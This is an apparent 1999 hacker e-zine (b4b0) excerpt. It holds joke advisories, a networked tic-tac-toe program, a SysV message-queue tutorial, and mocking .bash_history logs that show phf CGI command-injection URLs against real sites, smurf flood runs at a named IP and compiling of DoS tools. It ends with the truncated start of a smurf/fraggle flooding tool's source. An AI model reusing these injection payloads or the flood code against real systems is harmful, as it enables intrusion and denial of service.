dal.net | "ThEE lag EEz kEElEEng mEE"
!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0[ 11 ]b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b
b4b0 advisory [ Odometer Exploit ] [ Feb 3 1999 ]
-- Platform: 1975 Volvo 244 DL
-- Program: Odometer and Tripometer
-- Info: This advisory is in memory of atreyu (loser extraordinaire)
and Sheepie/Phartmang the old 2600 bots.
-- Synopsis: A vulnerability exists in the 1975 Volvo 244 DL's odometer
and tripometer, making the car seem more elite than it is,
possibly forcing the administrator to buy a Saturn.
-- Exploit: This vulnerability should be widely distributed to
all security experts because b4b0 knows that the average
BUGTRAQ reader's favorite car is a vintage Volvo.
The Volvo's odometer and tripometer work in conjunction
with one another to keep track of the miles an administrator
spends driving between home, work (to reboot the NT boxes
for their lazy admins), and Taco Bell (Yo Quiero b4b0). Using
a sophisticated piece of equipment (ie paperclip, wood chunk,
pencil), one can exploit the odometer so that it does not
track the mileage.
The exploit is simple yet evasive. By compressing the button
to "reset" the tripometer, the device is rendered useless. If
left in the compressed position, the odometer will not work.
-- Fixes: To follow b4b0's workaround tradition, we recommend that
you downgrade to a Ford Pinto or make the ultimate purchase
of a Saturn.
!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0[ 12 ]b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b
Stolen ISS Warez
Anonymous
/*
* Copyright (C) 1991 ISS, Inc.
* All Rights Reserved.
*
* THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF ISS
* The copyright notice above does not evidence any
* actual or intended publication of such source code.
*
* This code can be very dangerous if put in the wrong hands.
* Do not distribute.
*
*/
#include <stdio.h>
int main(void)
{
printf("Hello World");
return;
}
!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0[ 13 ]b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b
Strange, this looks a LOT like r4lphs nttt.c... el8.
/*
* phusnttt.c - TCP/IP TIC TAC TOE by phusnikn #decepticons or #linuxwarez
* You guessed it. Tic tac toe, taken to the next level. Play your
* friends, play your mom, even play so1o! Works on *BSD* and Linux
* as far as I know. Mail phusnikn@usa.net if it works on your non
* *BSD*\Linux system. If you don't like something in the code,
* for christs sake, don't tell me, just change it. Don't distribute
* modified versions, blah blah blah. The connector will always be
* X and the connected to will be O.
*
* DO NOTTT RUN THIS FUCKING PROGRAM AS ROOT. DONT GET OWNED BY
* STUPIDITY.
* compile: gcc -O2 -o nttt nttt.c
* Have fun.
* 12/31/1998
* phusnikn@usa.net
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
/* defines */
#define X 1
#define O 0
#define PORT 1999 /* Note Server/Client must use the same port. */
/* color defines 1;31 1;32 1;34 */
#define END "[0m"
#define RED "[1;32m"
#define GREEN "[1;30m"
#define BLUE "[1;36m"
#define BOLDWHITE "[38m"
#define BGRED "[1;41m"
/* function prototypes */
int main(int argc, char *argv[]); /* duh */
unsigned long getip(char *hostname); /* resolve hostname */
void initiate(unsigned long ip); /* initiate a connection */
void wait_for_connection(void); /* listen for a connection */
void usage(char *name); /* -h */
void play_ttt(void); /* main ttt function */
void draw(void); /* draw the grid on the screen */
void x_input(void); /* input X value */
void o_input(void); /* input O value */
void x_plot(int x_coord); /* update the grid */
void o_plot(int o_coord);
void sync_players(void); /* synchronize players */
int continue_ttt(void);
int check(char xoro); /* check for winner */
void color_fix(int sig); /* signal handler */
void reset_ttt(void); /* reset the ttt grid */
/* global socket descriptors BADBADBAD! */
int sockfd, newsockfd, sfd;
/* two dimensional array for phusttt grid */
char ttt[3][3] = {{'1','2','3'},{'4','5','6'},{'7','8','9'}};
/* player info struct */
struct players {
char remote[10]; /* usernames */
char local[10];
int x_or_o; /* are we X or O? */
}player;
/* duh */
int main(int argc, char *argv[])
{
int arg;
int cont = 1;
signal(SIGKILL, color_fix);
signal(SIGINT, color_fix);
if(argc < 2)
usage(argv[0]);
while((arg=getopt(argc, argv, "i:lh")) != EOF)
{
switch(arg)
{
case 'i': /* initiate */
{
printf("%splayername>%s%s ",BOLDWHITE,END,RED);
scanf("%9s", player.local);
initiate(getip(optarg));
while(cont == 1)
{
reset_ttt();
sync_players();
play_ttt();
cont = continue_ttt();
}
close(sockfd);
printf("%s", END);
exit(0);
}
case 'l': /* listen */
{
printf("%splayername>%s%s ",BOLDWHITE,END,RED);
scanf("%9s", player.local);
wait_for_connection();
while(cont == 1)
{
reset_ttt();
sync_players();
play_ttt();
cont = continue_ttt();
}
close(sockfd);
printf("%s", END);
exit(0);
}
case 'h':
{
usage(argv[0]);
}
default:
{
usage(argv[0]);
}
}
}
return(0);
}
unsigned long getip(char *hostname)
{
struct hostent *he;
if((he=gethostbyname(hostname)) == NULL) /* get that smaq */
{
herror("gethostbyname");
printf("%s", END);
exit(1);
}
return(inet_addr(inet_ntoa(*((struct in_addr *)he->h_addr)))); /* yuck. */
}
void usage(char *name)
{
fprintf(stderr, "%s%sTCP/IP TIC TAC TOE by phusnikn@usa.net%s\n",BGRED,BLUE,END);
fprintf(stderr, "%susage: %s -l [ listen for a connection ]\n",BLUE, name);
fprintf(stderr, " %s -i < remote host > [ initiate a connection ]\n", name);
fprintf(stderr, " %s -h [ help ]%s\n", name, END);
exit(0);
}
void draw(void)
{
(void)system("clear");
printf("\n\n\n\n\n\n\n\n\n\n");
printf("\t\t\t %s%c%s º %s %c %s º %s%c\n",BLUE,ttt[0][0],RED,BLUE,ttt[0][1],RED,BLUE,ttt[0][2]);
printf("\t\t\t %sÍÍÍÎÍÍÍÍÍÎÍÍÍ%s\n",RED,END);
printf("\t\t\t %s%c%s º %s %c %s º %s%c\n",BLUE,ttt[1][0],RED,BLUE,ttt[1][1],RED,BLUE,ttt[1][2]);
printf("\t\t\t %sÍÍÍÎÍÍÍÍÍÎÍÍÍ%s\n", RED, END);
printf("\t\t\t %s%c%s º %s %c %s º %s%c\n",BLUE,ttt[2][0],RED,BLUE,ttt[2][1],RED,BLUE,ttt[2][2]);
}
int continue_ttt(void)
{
char c;
printf("\n%s\t\t Play another game? (y)es/(n)o:%s%s ",BOLDWHITE,END,RED);
scanf("%1s", &c); /* PLEEZE SEY YES !@# */
if(c == 'y' || c == 'Y')
return(1);
else
return(0);
}
void reset_ttt(void)
{
ttt[0][0] = '1'; /* OINK */
ttt[0][1] = '2';
ttt[0][2] = '3';
ttt[1][0] = '4';
ttt[1][1] = '5';
ttt[1][2] = '6';
ttt[2][0] = '7';
ttt[2][1] = '8';
ttt[2][2] = '9';
}
void initiate(unsigned long ip)
{
struct sockaddr_in remote;
player.x_or_o = X; /* we are X */
bzero(&remote, sizeof(struct sockaddr_in));
remote.sin_family = AF_INET;
remote.sin_port = htons(PORT);
remote.sin_addr.s_addr = ip;
if((sfd=socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
perror("socket");
printf("%s", END);
exit(1);
}
printf("%s%sWaiting for player...%s\n",END,BOLDWHITE,END);
if(connect(sfd, (struct sockaddr *)&remote, sizeof(struct sockaddr)) == -1)
{
perror("connect");
printf("%s", END);
close(sfd);
exit(1);
}
send(sfd, player.local, sizeof(player.local), 0);
recv(sfd, player.remote, sizeof(player.remote), 0);
printf("%s%sConnection established with%s%s %s [ %s ]%s\n",END,BOLDWHITE,END,RED,player.remote
,inet_ntoa(remote.sin_addr.s_addr),END);
sleep(2);
}
void wait_for_connection(void)
{
struct sockaddr_in remote;
struct sockaddr_in local;
int addrlen;
player.x_or_o = O; /* we are O */
addrlen = sizeof(struct sockaddr_in);
bzero(&remote, sizeof(struct sockaddr_in));
bzero(&local, sizeof(struct sockaddr_in));
local.sin_family = AF_INET;
local.sin_port = htons(PORT);
local.sin_addr.s_addr = INADDR_ANY;
if((sockfd=socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
perror("socket");
printf("%s", END);
exit(1);
}
if(bind(sockfd, (struct sockaddr *)&local, sizeof(struct sockaddr)) == -1)
{
perror("bind");
printf("%s", END);
close(sockfd);
exit(1);
}
if(listen(sockfd, 1) == -1)
{
perror("listen");
printf("%s", END);
close(sockfd);
exit(1);
}
printf("%s%sWaiting for player...\n%s",END,BOLDWHITE,END);
if((newsockfd=accept(sockfd, (struct sockaddr *)&remote, &addrlen)) == -1)
{
perror("accept");
printf("%s", END);
close(sockfd);
exit(1);
}
sfd = newsockfd;
recv(sfd, player.remote, sizeof(player.remote), 0);
send(sfd, player.local, sizeof(player.local), 0);
printf("%s%sConnection established with %s%s%s [ %s ]%s\n",END,BOLDWHITE,END,RED, player.remote
, inet_ntoa(remote.sin_addr.s_addr), END);
sleep(2);
}
void x_input(void)
{
int coord;
if(player.x_or_o == O)
{
recv(sfd, &coord, sizeof(coord), 0);
x_plot(coord);
draw();
return;
}
printf("\n");
printf("\t\t\t %s%sX>%s%s ",END,BOLDWHITE,END,RED);
scanf("%d", &coord); /* d0nt LOSE !@#$ */
send(sfd, &coord, sizeof(coord), 0);
x_plot(coord);
draw();
return;
}
void o_input(void)
{
int coord;
if(player.x_or_o == X)
{
recv(sfd, &coord, sizeof(coord), 0);
o_plot(coord);
draw();
return;
}
printf("\n");
printf("\t\t\t %s%sO>%s%s ",END,BOLDWHITE,END,RED);
scanf("%d", &coord);
send(sfd, &coord, sizeof(coord), 0);
o_plot(coord);
draw();
return;
}
void x_plot(int x_coord)
{
switch(x_coord)
{
case 1:
if(ttt[0][0] == 'o' || ttt[0][0] == 'x')
{
printf("%s\t\t\tLocation %d is occupied%s",BOLDWHITE, x_coord, END);
x_input();
}
else
ttt[0][0] = 'x'; break;
case 2:
if(ttt[0][1] == 'o' || ttt[0][1] == 'x')
{
printf("%s\t\t\tLocation %d is occupied%s",BOLDWHITE, x_coord, END);
x_input();
}
else
ttt[0][1] = 'x'; break;
case 3:
if(ttt[0][2] == 'o' || ttt[0][2] == 'x')
{
printf("%s\t\t\tLocation %d is occupied%s",BOLDWHITE, x_coord, END);
x_input();
}
else
ttt[0][2] = 'x'; break;
case 4:
if(ttt[1][0] == 'o' || ttt[1][0] == 'x')
{
printf("%s\t\t\tLocation %d is occupied%s",BOLDWHITE, x_coord, END);
x_input();
}
else
ttt[1][0] = 'x'; break;
case 5:
if(ttt[1][1] == 'o' || ttt[1][1] == 'x')
{
printf("%s\t\t\tLocation %d is occupied%s",BOLDWHITE, x_coord, END);
x_input();
}
else
ttt[1][1] = 'x'; break;
case 6:
if(ttt[1][2] == 'o' || ttt[1][2] == 'x')
{
printf("%s\t\t\tLocation %d is occupied%s",BOLDWHITE, x_coord, END);
x_input();
}
else
ttt[1][2] = 'x'; break;
case 7:
if(ttt[2][0] == 'o' || ttt[2][0] == 'x')
{
printf("%s\t\t\tLocation %d is occupied%s",BOLDWHITE, x_coord, END);
x_input();
}
else
ttt[2][0] = 'x'; break;
case 8:
if(ttt[2][1] == 'o' || ttt[2][1] == 'x')
{
printf("%s\t\t\tLocation %d is occupied%s",BOLDWHITE, x_coord, END);
x_input();
}
else
ttt[2][1] = 'x'; break;
case 9:
if(ttt[2][2] == 'o' || ttt[2][2] == 'x')
{
printf("%s\t\t\tLocation %d is occupied%s",BOLDWHITE, x_coord, END);
x_input();
}
else
ttt[2][2] = 'x'; break;
}
}
void o_plot(int o_coord)
{
switch(o_coord)
{
case 1:
if(ttt[0][0] == 'o' || ttt[0][0] == 'x')
{
printf("%s\t\t\tLocation %d is occupied%s",BOLDWHITE, o_coord, END);
o_input();
}
else
ttt[0][0] = 'o'; break;
case 2:
if(ttt[0][1] == 'o' || ttt[0][1] == 'x')
{
printf("%s\t\t\tLocation %d is occupied%s",BOLDWHITE, o_coord, END);
o_input();
}
else
ttt[0][1] = 'o'; break;
case 3:
if(ttt[0][2] == 'o' || ttt[0][2] == 'x')
{
printf("%s\t\t\tLocation %d is occupied%s",BOLDWHITE, o_coord, END);
o_input();
}
else
ttt[0][2] = 'o'; break;
case 4:
if(ttt[1][0] == 'o' || ttt[1][0] == 'x')
{
printf("%s\t\t\tLocation %d is occupied%s",BOLDWHITE, o_coord, END);
o_input();
}
else
ttt[1][0] = 'o'; break;
case 5:
if(ttt[1][1] == 'o' || ttt[1][1] == 'x')
{
printf("%s\t\t\tLocation %d is occupied%s",BOLDWHITE, o_coord, END);
o_input();
}
else
ttt[1][1] = 'o'; break;
case 6:
if(ttt[1][2] == 'o' || ttt[1][2] == 'x')
{
printf("%s\t\t\tLocation %d is occupied%s",BOLDWHITE, o_coord, END);
o_input();
}
else
ttt[1][2] = 'o'; break;
case 7:
if(ttt[2][0] == 'o' || ttt[2][0] == 'x')
{
printf("%s\t\t\tLocation %d is occupied%s",BOLDWHITE, o_coord, END);
o_input();
}
else
ttt[2][0] = 'o'; break;
case 8:
if(ttt[2][1] == 'o' || ttt[2][1] == 'x')
{
printf("%s\t\t\tLocation %d is occupied%s",BOLDWHITE, o_coord, END);
o_input();
}
else
ttt[2][1] = 'o'; break;
case 9:
if(ttt[2][2] == 'o' || ttt[2][2] == 'x')
{
printf("%s\t\t\tLocation %d is occupied%s",BOLDWHITE, o_coord, END);
o_input();
}
else
ttt[2][2] = 'o'; break;
}
}
void sync_players(void)
{
char buf[7];
if(player.x_or_o == X)
{
send(sfd, "sync", 5, 0);
recv(sfd, buf, sizeof(buf), 0);
if(strcmp("synced", buf) != 0)
{
fprintf(stderr, "%sCouldn't sync!%s\n", BOLDWHITE, END);
close(sfd);
exit(1);
}
}
if(player.x_or_o == O)
{
recv(sfd, buf, sizeof(buf), 0);
if(strcmp("sync", buf) != 0)
{
fprintf(stderr, "%sCouldn't sync!%s\n", BOLDWHITE, END);
close(sfd);
exit(1);
}
send(sfd, "synced", 7, 0);
}
}
void play_ttt(void)
{
int c = 0;
draw();
for(;;)
{
x_input();
if(check('x'))
return;
c++; /* heh */
if(c==9)
{
return;
}
o_input();
if(check('o'))
return;
c++; /* heh? */
if(c==9)
{
return;
}
}
}
int check(char xoro) /* sorta sounds like porno */
{
int blah;
if(xoro=='x')
blah = X;
if(xoro=='o')
blah = O;
if(ttt[0][0]==xoro && ttt[0][1]==xoro && ttt[0][2]==xoro)
{
if(player.x_or_o==blah)
{
printf("\n%s\t\t\t YOU WIN %s%s\n",GREEN, player.local, END);
return(1); /* bewm */
}
printf("\n%s\t\t\t YOU LOSE %s%s\n",GREEN, player.local, END);
return(1);
}
if(ttt[1][0]==xoro && ttt[1][1]==xoro && ttt[1][2]==xoro)
{
if(player.x_or_o==blah)
{
printf("\n%s\t\t\t YOU WIN %s%s\n",GREEN, player.local, END);
return(1);
}
printf("\n%s\t\t\t YOU LOSE %s%s\n",GREEN, player.local, END);
return(1);
}
if(ttt[2][0]==xoro && ttt[2][1]==xoro && ttt[2][2]==xoro)
{
if(player.x_or_o==blah)
{
printf("\n%s\t\t\t YOU WIN %s%s\n",GREEN, player.local, END);
return(1);
}
printf("\n%s\t\t\t YOU LOSE %s%s\n",GREEN, player.local, END);
return(1);
}
if(ttt[0][0]==xoro && ttt[1][0]==xoro && ttt[2][0]==xoro)
{
if(player.x_or_o==blah)
{
printf("\n%s\t\t\t YOU WIN %s%s\n",GREEN, player.local, END);
return(1);
}
printf("\n%s\t\t\t YOU LOSE %s%s\n",GREEN, player.local, END);
return(1);
}
if(ttt[0][1]==xoro && ttt[1][1]==xoro && ttt[2][1]==xoro)
{
if(player.x_or_o==blah)
{
printf("\n%s\t\t\t YOU WIN %s%s\n",GREEN, player.local, END);
return(1);
}
printf("\n%s\t\t\t YOU LOSE %s%s\n",GREEN, player.local, END);
return(1);
}
if(ttt[0][2]==xoro && ttt[1][2]==xoro && ttt[2][2]==xoro)
{
if(player.x_or_o==blah)
{
printf("\n%s\t\t\t YOU WIN %s%s\n",GREEN, player.local, END);
return(1);
}
printf("\n%s\t\t\t YOU LOSE %s%s\n",GREEN, player.local, END);
return(1);
}
if(ttt[0][0]==xoro && ttt[1][1]==xoro && ttt[2][2]==xoro)
{
if(player.x_or_o==blah)
{
printf("\n%s\t\t\t YOU WIN %s%s\n",GREEN, player.local, END);
return(1);
}
printf("\n%s\t\t\t YOU LOSE %s%s\n",GREEN, player.local, END);
return(1);
}
if(ttt[2][0]==xoro && ttt[1][1]==xoro && ttt[0][2]==xoro)
{
if(player.x_or_o==blah)
{
printf("\n%s\t\t\t YOU WIN %s%s\n",GREEN, player.local, END);
return(1);
}
printf("\n%s\t\t\t YOU LOSE %s%s\n",GREEN, player.local, END);
return(1);
}
return(0);
}
void color_fix(int sig)
{
printf("%s\n", END);
close(sfd);
exit(0);
}
!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0[ 14 ]b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b
#hackphreak bash_history by jnz
Hi.
below are various .bash_history's from the official hackphreak box, doobie. This is
where all the cool hackphreak ops have their shells and work on their various projects.
some insignificant non-funny stuff edited out. enjoy, comments in "[]"
accipiter:
lynx www.army.mil
lynx www.army.mil/cgi-bin/phf/?Qalias=x%0aid [fjear.]
logout
lynx www.unitedskins.org/cgi-bin/phf/?Qalias=x%0aid
lynx www.unitedskins.com/cgi-bin/phf/?Qalias=x%0aid
lynx
w
BitchX
passwd 1q2w3e4r [that pazz still werks heh]
passwd accip 1q2w3e4r
BitchX
pico /etc/shadow
pico /etc/passwd
lynx www.coberco.nl/_vti_pvt/
telnet www.coberco.nl
telnet www.coberco.nl 23
gerbil:
gcc -o land land.c [this is the guy that accuses everyone of nuking him]
perhillio: [all these guys are hackpheak ops, i thought it said no nuking?]
rz
cc -O2 -o brkill brkill.c -lpcap
ls
gcc -o brkill brkill.c
rm brkill.c
gcc -O2 targa.c -o targa
rm targa.c
w
ls
gcc -DLINUX -o smurf5 papasmurf.c
ls
./smurf5
./smurf5 2.2.2.2 24.64.124.14
./smurf5 24.64.124.14
./smurf5 24.64.124.14 /eggdrop1.3.22/eggdrop
./smurf5 24.64.124.14 /home/perhill/eggdrop1.3.22/eggdrop [ugh.]
rm smurf5
ls
telnet ameri-cana.com
telnet p1mp1n.ml.org
sektorgrl:
ncftp ocalafl-ts-1-14-atlantic.net
ftp ocalafl-ts-1-14-atlantic.net
gcc -o BitchX bitchx.c
locate ip_udp.h
rm bitchx.c
id
mkdir tmp
mount cs.dit.ac.kr:/home1 tmp [enter eliteness.]
venomous:
ls
smurf2
bmud
ls
qpop
QPOP
/exec qop
exec qpop
ls
mail flair
ls
cat dead.letter
qpop
exec qpop
ls
./qpop [venomous is a part of milw0rm. from here on he unleashes
./smurf2 milw0rm hacking trade secrets]
./bmud
run .qpop
run ./qpop
rz
ls
gcc -O statd.c
mdir make
ls
rm *
rm bmud
rm qpop
rm QPOP
ls
rm make
cd make
ls
chmod 700 z0ne
./make
ls
./mscan
virtua:
pwd
startx [lets startx on our shell. ]
heh
lilo -u
c
start x
start c
c+
mail
irc
mirc
irc
start irc
mkdir hackingtextfiles
cd hackingtextfiles
cd hackingtextfiles
cd hackingtextfiles
ls
pwd
!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0[ 15 ]b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0
A QUICK AND DIRTY INTRO TO MESSAGE QUEUES
A message queue is a SySV IPC method. Like all IPC objects (methods, functions,
whatever) the message queue is used to communicate with other processes.
[Canul@/home/Canul/src/talkd/msgque 4:23pm]% man -k msg
msgctl (2) - message control operations
msgget (2) - get a message queue identifier
msgop (2) - message operations
recv, recvfrom, recvmsg (2) - receive a message from a socket
send, sendto, sendmsg (2) - send a message from a socket
(END)
For you to make a message queue, just as in making a semaphore or a shared memory segment, you need a project
identifier. This can be done by using the system call ftok.
Ftok needs a pathname to work.
SYNOPSIS
#include <sys/types.h>
#include <sys/ipc.h>
key_t ftok (char *pathname, char proj)
RETURN VALUE
On success the return value will be the converted key_t value, otherwise -1 with errno.
Then you can use msgget to get the message identifier using the key_ted valued returned from ftok.
SYNOPSIS
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
int msgget(key_t key, int msgflg)
RETURN VALUE
If successful, the return value will be the message queue identifier (a nonnegative integer), otherwise
-1 with errno indicating.
After you have the value of the message indentfier you can start sending and receving from it with the use of
msgsnd and msgrcv, you can also change its permissions (perms) with msgctl.
SYNOPSIS
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
int msgsnd(int msqid, struct msgbuf *msgp", int msgsz, int msgflg)
int msgrcv(int msqid, struct msgbuf *msgp, int msgsz, long msgtyp, int msgflg)
DESCRIPTION
To send or receive a message, the calling process allocates a structure that looks like the following
struct msgbuf {
long mtype; /* message type, must be > 0 */
char mtext[1]; /* message data */
};
msqid is the message identifier (the value that you should have gotten from msgget). msgsz is the size of the
msgbuf minus the mtype (in pesudo-code long minus the sizeof msgbuf). Of course here msgbuf can be redefined,
e.g in a header file, but when you pass the redefined structure to the function it must have the first element being
a type long and the rest can be of any format and you must cast that structure as msgbuf. msgflg, well this flag
you can usually leave to 0 but it is used for special requirements (try man msgop). In msgrcv te msgtyp field
is to indicate what message from the message queue you would like to receive. This will be decided by the message's
long mtype field, which always has to be positive number.
The system call msgctl can be used to remove the message identifier and can also be used to change its perms.
SYNOPSIS
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
int msgctl(int msqid, int cmd, struct msqid_ds *buf)
cmd can be either IPC_STAT; returns information of the message queue back to *buf, IPC_SET; changes the msgque
(msg identifier) according to *buf, or IPC_RMID; removes the message identifier.
[Canul@/usr/local/src/linux/include/linux 5:13pm]% more msg.h
#ifndef _LINUX_MSG_H
#define _LINUX_MSG_H
#include <linux/ipc.h>
/* ipcs ctl commands */
#define MSG_STAT 11
#define MSG_INFO 12
/* msgrcv options */
#define MSG_NOERROR 010000 /* no error if message is too big */
#define MSG_EXCEPT 020000 /* recv any msg except of specified type.*/
/* one msqid structure for each queue on the system */
struct msqid_ds {
struct ipc_perm msg_perm;
struct msg *msg_first; /* first message on queue */
struct msg *msg_last; /* last message in queue */
__kernel_time_t msg_stime; /* last msgsnd time */
__kernel_time_t msg_rtime; /* last msgrcv time */
__kernel_time_t msg_ctime; /* last change time */
struct wait_queue *wwait;
struct wait_queue *rwait;
unsigned short msg_cbytes; /* current number of bytes on queue */
unsigned short msg_qnum; /* number of messages in queue */
unsigned short msg_qbytes; /* max number of bytes on queue */
__kernel_ipc_pid_t msg_lspid; /* pid of last msgsnd */
__kernel_ipc_pid_t msg_lrpid; /* last receive pid */
};
With this you already know what msqid_ds holds.
Here is some lame source that I wrote:
# Bold Teeth Makefile
CC= gcc
CFLAGS= -Wall -g -O2
ALL= talk talkd
all: ${ALL}
clean:
rm -rf talk talkd *~
talk:
${CC} ${CFLAGS} -o talk talk.c
talkd:
${CC} ${CFLAGS} -o talkd talkd.c
/* talkd.h by Canul */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <errno.h>
#define VERSION "talkd v0.1 by Canul. canul7@yahoo.com"
#define PATHNAME "."
#define MAGICNUM 5400L
#define DATA_LIMIT 1024
#define TIME_TO_SLEEP 5
struct passwd *checker;
struct pak
{
long header;
char data[DATA_LIMIT];
};
struct mymsgbuf
{
long mtype;
struct pak bata;
};
int msgsz = sizeof(struct mymsgbuf) - sizeof(long);
/*
* $Id: talk.c,v 0.1 1999/1/10 17:53:21 Canul Exp $
*/
#include "talkd.h"
int send_message(void);
int get_message(void);
int setup(void);
struct mymsgbuf *dmsg;
int qid;
long myqid;
void
main(void)
{
char opt;
if (setup())
{
puts("there was an error setting up");
exit(1);
}
printf("Press the letter \"s\" to send a message or \"g\" to wait for a message.\n");
opt = fgetc(stdin);
switch (opt)
{
case 's':
if (send_message())
{
puts("couldn't send the message");
exit(1);
}
break;
case 'g':
if (get_message())
{
puts("couldn't receive message");
exit(1);
}
break;
default:
printf("%c unrecognized option\n", opt);
break;
}
}
int
setup(void)
{
key_t key;
if ((key = ftok(PATHNAME, 'a')) == -1)
return 1;
if ((qid = msgget(key, IPC_NOWAIT)) == -1)
return 1;
return 0;
}
int
send_message(void)
{
int i,
d;
char *p;
dmsg = (struct mymsgbuf *) malloc(sizeof(struct mymsgbuf));
dmsg->mtype = MAGICNUM;
printf("enter long: ");
scanf("%d", &d);
dmsg->bata.header = (long *) d;
printf("%ld is the header type\n", dmsg->bata.header);
p = dmsg->bata.data;
printf("Enter message: ");
for (i = 0; i < DATA_LIMIT - 1; i++)
{
if ((*p = fgetc(stdin)) == EOF)
break;
p++;
}
*p = '\0';
printf("\nSending message to resource %d\n", qid);
if (msgsnd(qid, (struct msgbuf *) dmsg, msgsz, 0) == -1)
{
perror("msgsnd");
return (1);
}
free(dmsg);
return 0;
}
int
get_message(void)
{
int d;
dmsg = (struct mymsgbuf *) malloc(sizeof(struct mymsgbuf));
printf("enter message type: ");
scanf("%d", &d);
dmsg->bata.header = (long *) d;
if ((msgrcv(qid, (struct msgbuf *) dmsg, msgsz, myqid, 0)) == -1)
{
perror("msgrcv");
return 1;
}
printf("Received: %s\n", dmsg->bata.data);
free(dmsg);
return 0;
}
/*
* talkd.c this code is self-explanitory. (I hope)
*/
#include "talkd.h"
#define LOG_PATH "log"
int qid;
struct mymsgbuf *msgp;
void signalhandler(int a);
void
main(int argc, char **argv)
{
pid_t daemon;
key_t key;
FILE *fp;
fp = fopen(LOG_PATH, "a");
msgp = (struct mymsgbuf *) malloc(sizeof(struct mymsgbuf));
signal(SIGTERM, signalhandler);
puts(VERSION);
if ((key = ftok(PATHNAME, 'a')) == -1)
{
perror("stat");
exit(1);
}
if ((qid = msgget(key, IPC_CREAT | 0660)) == -1)
{
perror("mesgget");
exit(1);
}
if ((daemon = fork()) == -1)
{
perror("fork");
exit(1);
}
if (daemon)
{
exit(0);
}
setsid();
if ((daemon = fork()) == -1)
{
perror("fork");
exit(1);
}
else if (daemon)
exit(0);
/*
* kill that parent!
*/
while (1)
{
if ((msgrcv(qid, (struct msgbuf *) msgp, msgsz, MAGICNUM, 0)) != -1)
{
msgp->mtype = msgp->bata.header;
fprintf(fp, "server: msg to %d with mtype %ld\n", qid, msgp->mtype);
if (msgsnd(qid, (struct msgbuf *) msgp, msgsz, 0) == -1)
{
perror("msgsnd");
exit(1);
/*
* do whatever
*/
}
}
else
{
perror("msgrcv");
exit(1);
}
}
}
void
signalhandler(int a)
{
printf("caught ^C\n");
if ((msgctl(qid, IPC_RMID, NULL)) == -1)
{
perror("msgctl");
exit(1);
}
}
!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0[ 16 ]b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b
Fear Morpheus. Now.
(comments in []s)
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <ctype.h>
#include <string.h>
#include <time.h>
#include <unistd.h>
char public[15];
char version[5] = "1.4";
char author[15] = "Morpheus";
/* define color variables */
char red[] = "\033[1;31m";
char dred[] = "\033[0;31m"; [ COLORZ fEAR ]
char blue[] = "\033[1;34m";
char norm[] = "\033[0;37m";
char white[] = "\033[1;37m";
char dgrey[] = "\033[1;30m";
char cyan[] = "\033[0;36m";
#define PRIVATE
/* undefine this for public releases */
#undef DEBUG
/* Used for debuging purposes only */
struct pktinfo
{
int ps;
int src;
int dst;
};
void banner(void);
void bad_type(void);
void usage(char *);
void smurf(int, struct sockaddr_in, u_long, int);
void ctrlc(int);
void fraggle (int, struct sockaddr_in *, u_long dest, struct pktinfo *);
unsigned short in_chksum(u_short *, int);
unsigned short checksum (u_short *, int);
void banner (void)
{
sprintf(public, "%sPUBLiC", blue); [ k-rad coloring ]
fprintf(stderr, "\n%sTh%se %sJ%sa%sckH%sa%smm%se%sr %sby %s.o(%s%s%s)o.\n",
dgrey, dred, dgrey, dred, dgrey, dred, dgrey, dred, dgrey, red, cyan, white, author, cyan);
#ifdef PRIVATE
sprintf(public,"%sPRiVaTE", red);
#endif
fprintf(stderr, "%sV%se%srs%sio%sn %s: %s%s %s[%s%s]%s\n\n", dgrey, dred,
dgrey, dred, dgrey, red, cyan, version, dgrey, public, dgrey, norm);
}
void bad_type(void)
{
fprintf(stderr, "%sMust Choose Attack Type!\n\n%sType\n%s----\n"
"%su %s = %s UDP\ni %s = %s ICMP\n\n%s",
red, dgrey, cyan, red, cyan, red, cyan, red, norm);
exit(-1);
}
void usage (char *prog)
{
fprintf(stderr, "%susage%s: %s%s %s<%stype%s> [%sb file%s] <%starget%s> <%snum packets%s> "
"<%spacket delay%s> <%spacket size%s>"
/* " [%ssrc port%s] [%sdest port%s]" */
"\n", dgrey, cyan, white, prog, cyan, dgrey, cyan, dgrey,
cyan, dgrey, cyan, dgrey, cyan, dgrey, cyan, dgrey, cyan
/* dgrey, cyan, dgrey, cyan, */
);
fprintf(stderr, "\n%snum packets of %s0%s constant flood\n"
"src port of %s0%s for random\n"
"%s[bc address]%s can also be used in "
"place of %s[b file]%s for a single bcast%s\n\n",
dgrey, red, dgrey, red, dgrey, red, dgrey, red, dgrey, norm);
exit(-1);
}
void smurf (int sock, struct sockaddr_in sin, u_long dest, int psize)
{
struct iphdr *ip;
struct icmphdr *icmp; [ can't even write hiz own smurf function? ]
char *packet; [ tfreak iz going to be PISSED ]
packet = malloc(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);
